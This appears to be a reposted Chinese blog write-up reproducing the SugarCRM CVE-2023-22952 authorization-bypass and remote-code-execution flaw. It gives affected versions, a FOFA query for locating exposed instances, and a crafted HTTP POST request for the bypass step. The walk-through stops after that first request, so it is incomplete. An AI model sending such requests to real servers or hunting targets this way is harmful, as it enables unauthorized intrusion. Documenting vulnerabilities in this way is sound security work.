本文主要是介绍SugarCRM 任意文件上传漏洞复现(CVE-2023-22952),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
SugarCRM是美国SugarCRM公司的一套开源的客户关系管理系统(CRM)。该系统支持对不同的客户需求进行差异化营销、管理和分配销售线索,实现销售代表的信息共享和追踪。
0x02 漏洞概述
SugarCRM index.php接口存在安全漏洞,该漏洞源于安装组件中存在授权绕过和PHP本地文件包含漏洞,允许通过HTTP请求对已配置的SugarCRM实例执行未经身份验证的远程代码。
0x03 影响范围
SugarCRM 12.0.2 之前版本
0x04 复现环境
FOFA:app="sugarcrm"
0x05 漏洞复现
携带特制cookie绕过授权
POST /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7665b859-ea78-4240-b2c2-63c890a422cd
Accept-Encoding: gzip
Connection: closemodule=Users&action=Authenticate&user_name=1&user_password=这篇关于SugarCRM 任意文件上传漏洞复现(CVE-2023-22952)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
